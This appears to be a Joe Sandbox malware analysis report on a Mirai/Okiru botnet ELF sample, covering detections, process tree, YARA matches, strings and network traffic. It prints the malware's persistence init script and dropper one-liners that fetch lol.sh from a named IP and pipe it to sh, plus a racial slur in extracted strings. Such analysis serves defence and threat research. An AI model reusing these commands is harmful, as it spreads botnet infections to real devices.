Edit tour

Linux Analysis Report
x86_32.nn.elf

Overview

General Information

Sample name:	x86_32.nn.elf
Analysis ID:	1568917
MD5:	c32c3d338238953b22589c540fd85e64
SHA1:	f8fc4a3ffd7a1fdf307a73e68edede3ee2eb49f6
SHA256:	abc37ba47cc9897d2b0458c13a29350d3fb933a5dc605376e728961dc877a605
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru

Score:	88
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Yara detected Okiru

Drops files in suspicious directories

Machine Learning detection for sample

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Writes shell script file to disk with an unusual file extension

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568917
Start date and time:	2024-12-05 08:02:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	x86_32.nn.elf
Detection:	MAL
Classification:	mal88.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/x86_32.nn.elf
PID:	6232
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

x86_32.nn.elf (PID: 6232, Parent: 6157, MD5: c32c3d338238953b22589c540fd85e64) Arguments: /tmp/x86_32.nn.elf

x86_32.nn.elf New Fork (PID: 6241, Parent: 6232)

x86_32.nn.elf New Fork (PID: 6242, Parent: 6232)

sh (PID: 6242, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6267, Parent: 6242)

systemctl (PID: 6267, Parent: 6242, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

x86_32.nn.elf New Fork (PID: 6307, Parent: 6232)

sh (PID: 6307, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6308, Parent: 6307)

chmod (PID: 6308, Parent: 6307, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

x86_32.nn.elf New Fork (PID: 6309, Parent: 6232)

sh (PID: 6309, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6310, Parent: 6309)

ln (PID: 6310, Parent: 6309, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

x86_32.nn.elf New Fork (PID: 6313, Parent: 6232)

sh (PID: 6313, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

x86_32.nn.elf New Fork (PID: 6315, Parent: 6232)

sh (PID: 6315, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

sh New Fork (PID: 6316, Parent: 6315)

chmod (PID: 6316, Parent: 6315, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh

x86_32.nn.elf New Fork (PID: 6329, Parent: 6232)

sh (PID: 6329, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6330, Parent: 6329)

mkdir (PID: 6330, Parent: 6329, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

x86_32.nn.elf New Fork (PID: 6331, Parent: 6232)

sh (PID: 6331, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

sh New Fork (PID: 6332, Parent: 6331)

ln (PID: 6332, Parent: 6331, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh

x86_32.nn.elf New Fork (PID: 6335, Parent: 6232)

x86_32.nn.elf New Fork (PID: 6337, Parent: 6335)

x86_32.nn.elf New Fork (PID: 6338, Parent: 6335)

x86_32.nn.elf New Fork (PID: 6339, Parent: 6335)

udisksd New Fork (PID: 6244, Parent: 799)

dumpe2fs (PID: 6244, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6275, Parent: 799)

dumpe2fs (PID: 6275, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6280, Parent: 6278)

snapd-env-generator (PID: 6280, Parent: 6278, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 6292, Parent: 1477)

sh (PID: 6292, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

gsd-housekeeping (PID: 6292, Parent: 1477, MD5: b55f3394a84976ddb92a2915e5d76914) Arguments: /usr/libexec/gsd-housekeeping

dash New Fork (PID: 6311, Parent: 4331)

rm (PID: 6311, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA

dash New Fork (PID: 6314, Parent: 4331)

rm (PID: 6314, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.XBu45Y3Wjt /tmp/tmp.7z05jTzkif /tmp/tmp.34WcYkzQMA

gdm3 New Fork (PID: 6333, Parent: 1320)

Default (PID: 6333, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6334, Parent: 1320)

Default (PID: 6334, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

udisksd New Fork (PID: 6344, Parent: 799)

dumpe2fs (PID: 6344, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6419, Parent: 799)

dumpe2fs (PID: 6419, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6422, Parent: 799)

dumpe2fs (PID: 6422, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6424, Parent: 799)

dumpe2fs (PID: 6424, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6425, Parent: 799)

dumpe2fs (PID: 6425, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6426, Parent: 799)

dumpe2fs (PID: 6426, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6427, Parent: 799)

dumpe2fs (PID: 6427, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
x86_32.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
x86_32.nn.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
x86_32.nn.elf	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
x86_32.nn.elf	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
x86_32.nn.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
x86_32.nn.elf	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x126c5:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
x86_32.nn.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd7d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
x86_32.nn.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x116e1:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
x86_32.nn.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfbc2:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
x86_32.nn.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd7a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6232.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6232.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x126c5:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd7d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x116e1:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfbc2:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6232.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd7a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6335.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6335.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x126c5:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd7d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x116e1:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfbc2:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6335.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd7a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6241.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6241.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x126c5:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd7d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x116e1:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfbc2:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6241.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd7a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6339.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
6339.1.0000000008048000.000000000805f000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0x11a8b:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_fa3ad9d0	unknown	unknown	0x4948:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x4c1b:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1 0x55d5:$a: CB 08 C1 CB 10 66 C1 CB 08 31 C9 8A 4F 14 D3 E8 01 D8 66 C1
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x56d0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x126c5:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xd7d2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0x116e1:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xfbc2:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6339.1.0000000008048000.000000000805f000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xd7a2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Process Memory Space: x86_32.nn.elf PID: 6232	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6241	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6335	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: x86_32.nn.elf PID: 6339	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Click to see the 39 entries

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for sample

Source: x86_32.nn.elf

Joe Sandbox ML: detected

Source: x86_32.nn.elf	String: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
Source: x86_32.nn.elf	String: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- \| sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- \| sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- \| sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A" 5

Source: global traffic	TCP traffic: 192.168.2.23:38964 -> 154.216.19.139:199
Source: global traffic	TCP traffic: 192.168.2.23:60022 -> 94.156.227.234:38242

Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 154.216.19.139
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 129.174.103.29
Source: unknown	TCP traffic detected without corresponding DNS query: 200.15.44.155
Source: unknown	TCP traffic detected without corresponding DNS query: 212.129.157.204
Source: unknown	TCP traffic detected without corresponding DNS query: 219.4.115.95
Source: unknown	TCP traffic detected without corresponding DNS query: 145.223.199.144
Source: unknown	TCP traffic detected without corresponding DNS query: 28.135.226.21
Source: unknown	TCP traffic detected without corresponding DNS query: 140.197.190.186
Source: unknown	TCP traffic detected without corresponding DNS query: 86.95.2.60
Source: unknown	TCP traffic detected without corresponding DNS query: 9.133.96.39
Source: unknown	TCP traffic detected without corresponding DNS query: 56.113.94.213
Source: unknown	TCP traffic detected without corresponding DNS query: 151.249.42.76
Source: unknown	TCP traffic detected without corresponding DNS query: 120.157.94.218
Source: unknown	TCP traffic detected without corresponding DNS query: 26.202.86.167
Source: unknown	TCP traffic detected without corresponding DNS query: 222.202.140.133
Source: unknown	TCP traffic detected without corresponding DNS query: 70.162.134.108
Source: unknown	TCP traffic detected without corresponding DNS query: 163.206.140.184
Source: unknown	TCP traffic detected without corresponding DNS query: 9.38.169.204
Source: unknown	TCP traffic detected without corresponding DNS query: 56.201.235.136
Source: unknown	TCP traffic detected without corresponding DNS query: 58.65.241.107
Source: unknown	TCP traffic detected without corresponding DNS query: 160.106.164.183
Source: unknown	TCP traffic detected without corresponding DNS query: 6.94.1.73
Source: unknown	TCP traffic detected without corresponding DNS query: 177.21.18.87
Source: unknown	TCP traffic detected without corresponding DNS query: 185.29.24.192

